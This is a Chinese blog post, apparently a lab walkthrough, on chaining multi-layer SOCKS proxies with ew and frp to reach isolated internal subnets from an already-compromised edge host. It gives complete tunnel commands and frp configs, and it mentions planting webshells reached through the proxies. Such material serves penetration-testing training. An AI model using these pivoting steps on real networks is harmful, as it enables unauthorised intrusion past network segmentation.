ew和frp多层代理方法

最新推荐文章于 2024-05-30 16:08:30 发布
最新推荐文章于 2024-05-30 16:08:30 发布
阅读量269 收藏 2
点赞数
分类专栏: web安全 文章标签: 网络 web安全 安全

目录

前言

平时看大部分文章都是讲的两层网络的穿透,在真实场景下,有时候是三层甚至四层,自己实践之后发现还是和两层网络差距比较大的。由于是三层网络,写起来图会比较多,选取了四款常用穿透软件:ew,nps,frp进行试验。

环境搭建

拓扑图如下:

在这里插入图片描述

192.168.1.0/24模拟公网环境。

每台PC上都有一个web服务,内网主机除边缘win7外全部不出网,内网同网段之间的主机可以相互访问,不同网段相互隔离。

假设现在已经拿到边缘主机win7。(文中所指的win2012全部指相对左边这台)

ew

先看下出不出网,ping一下win7发现是出网的,这种就可以使用反向连接。

将ew上传至边缘机器。

在这里插入图片描述
在攻击机上执行:

ew_for_Win.exe -s rcsocks -l 1080 -e 1234

在这里插入图片描述
在边缘机器上执行:

ew_for_Win.exe -s rssocks -d 192.168.1.104 -e 1234

这时候回来看攻击机,就已经成功了。

在这里插入图片描述
给浏览器设置一个代理,即可访问内网web。

在这里插入图片描述
在这里插入图片描述

经过一系列操作,我们又写入了一个shell。同样这里需要开启蚁剑代理。

在这里插入图片描述
在这里插入图片描述
查看192.168.183.134这台主机是否出网,结果是不出网。

在这里插入图片描述
由于需要执行命令,我们得保证一级代理不能掉。所以这里我用了两个webshell工具,蚁剑和冰蝎。

蚁剑关闭代理,冰蝎开启sock5代理1080端口,冰蝎去连192.168.183.134这台不出网主机,蚁剑连接边缘机器192.168.1.110。

攻击机另起一个cmd,执行命令:

ew_for_Win.exe -s lcx_listen -l 3080 -e 8888

注意这里的端口不要和刚刚1080端口重合。

不出网主机win2012执行命令:

ew_for_Win.exe -s ssocksd -l 9999

在这里插入图片描述
这里没回显是正常的,但要保证一级代理不能掉。

再通过边缘机器打通192.168.1.110:8888 和 192.168.183.134:9999 之间的通讯隧道。

ew_for_Win.exe -s lcx_slave -d 192.168.1.104 -e 8888 -f 192.168.183.134 -g 9999

在这里插入图片描述
在这里插入图片描述
这里同样的浏览器再挂个代理就可以了。

在这里插入图片描述

在这里插入图片描述
再拿webshell工具去连的话就另外再挂个3080代理就行了。

在这里插入图片描述

frp

攻击机配置frps.ini文件

[common]
bind_port = 7000

边缘机器配置frpc.ini

[common]
server_addr = 192.168.1.104
server_port = 7000
[http_proxy]
type = tcp
plugin=socks5
remote_port = 6000

攻击机执行命令

frps.exe -c frps.ini

在这里插入图片描述
边缘机器执行命令

frpc.exe ‐c frpc.ini

在这里插入图片描述
浏览器挂代理访问6000端口即可

在这里插入图片描述
拿到win2012的webshell权限后,准备进一步代理到192.168.57.0/24。一级代理不要掉。

攻击机配置frps.ini

[common]bind_addr = 0.0.0.0bind_port = 7788

在这里插入图片描述
边缘主机win7配置frps.ini

[common]bind_addr = 192.168.183.131  bind_port = 7799

在这里插入图片描述
同时配置win7主机上frpc.ini

[common]server_addr = 192.168.1.104 server_port = 7788  [http_proxy]type = tcplocal_ip = 192.168.183.131  local_port = 1080    remote_port = 1080

在这里插入图片描述
在这里插入图片描述
同样上传frp到win2012上,配置frpc.ini

[common]server_addr = 192.168.183.131 server_port = 7799        [http_proxy]type = tcpremote_port = 1080 plugin = socks5

在这里插入图片描述
执行frpc.exe ‐c frpc.ini,这里都是没什么回显。

设置代理1080

在这里插入图片描述
在这里插入图片描述
同样的写入shell之后webshell工具连接挂个代理就行了。

在这里插入图片描述
在这里插入图片描述

zxl2605
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
FRP三层代理实验
qq_42383069的博客
03-22 2177
环境简介 **0x01. Win Server2012** 1. ip_1:192.168.0.154 2. ip_2: 10.10.20.12(仅主机模式) 3. user/passwd : Administrator:Admin12345 **0x02. Win 7** 4. ip_1: 10.10.20.7(仅主机模式) 5. ip_2: 10.10.10.7(仅主机模式) 6. 本地管理员:john:admin!@#45 域账户:redteam\saul:admin!@#45 *
frp内网穿透】
一纸荒芜的博客
07-07 2676
frp内网穿透
隧道技术 Frp 多层内网穿透
Love&Share
12-21 4226
文章目录Frp穿透Frp多层内网实战实验环境操作第一层隧道第二层隧道 Frp穿透 项目地址:https://github.com/fatedier/frp 中文文档:https://gofrp.org/docs/ frp 是一个可用于内网穿透的高性能的全平台反向代理应用,支持 TCP、UDP、HTTP、HTTPS 等多种协议。可以将内网服务以安全、便捷的方式通过具有公网 IP 节点的中转暴露到公网 frp 采用 Golang 编写,支持跨平台,仅需下载对应平台的二进制文件即可执行,没有额外依赖 F.
内网渗透建立代理通道(如何攻击目标内网机器?)-Socks代理(゚益゚メ) 渗透测试
寻觅的博客
04-25 2199
文章目录搭建靶场配置虚拟机网络虚拟机 搭建靶场 配置虚拟机网络 这里我用的是最常见的VMware Workstation虚拟机软件,我们先做一个内部的网络环境 虚拟机 我这里是使用的是CFS三层靶机环境 下载链接:https://pan.baidu.com/s/1n2i6Tr2lXC_T8kSEJFcBsA 提取码:ni2v 我发现网上的方法吧DHCP关掉后我的靶机就无法获取到IP地址了,所以我又开启了这里的DHCP。这里IP最后一段不和说明书是完全一样也不影响。 尝试一下通网段能互相ping通即可,
内网代理转发工具
tomyyyyy
12-09 3490
目录概念区分端口转发端口映射代理隧道端口转发工具概念讲解socket端口转发socks代理两者的异同端口转发常用工具msf反弹木马lcxportmapssh端口转发iptables 端口转发firewall 端口转发socks代理工具基于web服务的socks5工具reGeorgTunna能够进行多层代理的工具Earthworm(又称ew)Termitevenomfuso多功能型的代理工具frp...
内网穿透之多层代理
weixin_43047908的博客
10-10 2344
目录前言环境搭建ewfrp 前言 平时看大部分文章都是讲的两层网络的穿透,在真实场景下,有时候是三层甚至四层,自己实践之后发现还是和两层网络差距比较大的。由于是三层网络,写起来图会比较多,选取了四款常用穿透软件:ew,nps,frp进行试验。 环境搭建 拓扑图如下: 192.168.1.0/24模拟公网环境。 每台PC上都有一个web服务,内网主机除边缘win7外全部不出网,内网同网段之间的主机可以相互访问,不同网段相互隔离。 假设现在已经拿到边缘主机win7。(文中所指的win2012全部指相对左边这台
内网入口——代理搭建&端口转发
Captain_RB的博客
12-19 9782
在内网渗透过程中经常会遇到搭建代理和端口转发的情况,本文记录一些常用工具的使用方法和典型应用场景,便于查阅。
红蓝对抗之隧道技术第二篇(reGeorg内网穿透、SSH隧道本地Socks代理、SSH远程转发、Earthworm Socks5代理、Tunna正向代理、ICMP隧道、DNS隧道、Frp穿透)
Love&Share
12-21 1346
在进行内网渗透时,由于外网主机无法直接连接内网主机,所以需要使用隧道技术来搭建连接通道访问内网主机即内网穿透
[内网渗透]—内网穿透
Sentiment的博客
12-08 1467
这几个概念其实是比较难区分的,特别是和后面的内网穿透混在一起,在宏观上说,他们差别不大。
使用Earthworm (EW) 做Socks5代理
01-09
正向代理 1.选择合适的ew文件(将文件ew_…改为ew.exe,为了在命令行少敲几个字母),上传到边缘服务器 2.边缘服务器输入 ew.exe -s ssocksd -l 8000 3.可借助proxifier工具配置攻击机整台机器的代理(proxifier添加...
使用EW作Socks5代理进行内网渗透1
08-03
1. 如何使用EW做反向Socks5代理 2. 浏览器如何设置Socks5代理访问目标内网Web服务 3. 利用proxychains给终端设置Socks5代理
IAR FOR EW8051 7.51A安装方法
11-15
IAR FOR EW8051 7.51A安装方法
等间距 EW方法 和 CAIM 生成多粒度数据
06-02
%%% Time:2022.06.15; Aim: 等间距 EW方法 和 CAIM 生成多粒度数据 %%% data: 输入的数据,包含最后的类别标签 %%% breakpoints:断点集合
EW(Earthworm)
06-08
EW(Earthworm)是一套便携式的网络穿透工具,具有SOCKS v5服务架设和端口转发两大核心功能,可在复杂网络环境下完成网络穿透。
冶炼钢铁厂热风炉发酵池煤矸石进回水无线远程温度监测
最新发布
weixin_46970383的博客
05-30 222
Modbus RTU 标准Modbus-RTU通信协议。Modbus RTU使用二进制格式传输数据,并使用串行通信协议(如RS-232或RS-485)进行数据传输。它通常用于连接不同厂家的可编程逻辑控制器(PLC)、传感器、执行器和其他自动化设备。
【TC8】如何测试IOP中PHY芯片的Llink-up time
jasonj333
05-28 90
在TC8一致性测试用例中,物理层的测试用例分为两个部分:IOP和PMA。其中IOP中对PHY芯片的Link-up时间的测试,又包含三个测试用例。这三条case从名称就能够判断出它们的不同。OABR_LINKUP_01是给DUT的对手件上电唤醒,OABR_LINKUP_02是DUT上电唤醒,OABR_LINKUP_03是DUT报文唤醒。
IP协议说明
banchengl的博客
05-28 1248
IP 指网际互连协议, Internet Protocol 的缩写,是 TCP/IP 体系中的网络层协议。设计 IP 的目的是提高网络的可扩展性:一是解决互联网问题,实现大规模、异构网络的互联互通;二是分割顶层网络应用和底层网络技术之间的耦合关系,以利于两者的独立发展。根据端到端的设计原则, IP 只为主机提供一种无连接、不可靠的、尽力而为的数据包传输服务。
使用Django实现WebSocket
Code掘金的博客
05-29 853
在Django中,WebSocket的请求由一个称为Consumer的处理器来处理。WebSocket是一种在单个TCP连接上进行全双工通信的协议,在Web开发中被广泛应用于实时通信和数据推送。以上就是使用Django实现WebSocket的简单示例,通过配置Consumer、路由和前端页面,我们可以轻松地实现基于WebSocket的实时通信功能。现在,我们已经完成了WebSocket的设置,可以运行Django应用并访问相应的页面。最后,在前端页面中使用WebSocket来建立连接并发送消息。
mybatisplus ew
06-08
Mybatis-Plus中的EW是一个强大的查询条件构造器,可以帮助开发者快速构建复杂的查询条件。EW的主要特点包括: 1. 类似于SQL的语法:EW的语法类似于SQL语句,易于理解和使用。 2. 支持多种查询条件:EW支持等于、不等于、大于、小于、模糊查询、in查询、between查询等多种查询条件,可以满足不同的查询需求。 3. 支持多表关联查询:EW支持多表关联查询,可以通过Wrapper对象的setSqlSelect方法指定需要查询的字段。 4. 支持Lambda表达式:EW还支持Lambda表达式,可以使用Java8中的Lambda语法来构建查询条件,使得代码更加简洁。 使用EW的步骤如下: 1. 创建一个Wrapper对象。 2. 使用Wrapper对象的方法构建查询条件。 3. 调用BaseMapper的select方法进行查询。 例如,下面的代码演示了如何使用EW进行查询: ```java Wrapper<User> wrapper = new QueryWrapper<User>() .eq("name", "张三") .eq("age", 18); List<User> userList = userMapper.selectList(wrapper); ``` 这段代码使用QueryWrapper构建了一个查询条件,查询名字为“张三”且年龄为18岁的用户信息。最后使用userMapper的selectList方法进行查询,并返回查询结果。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值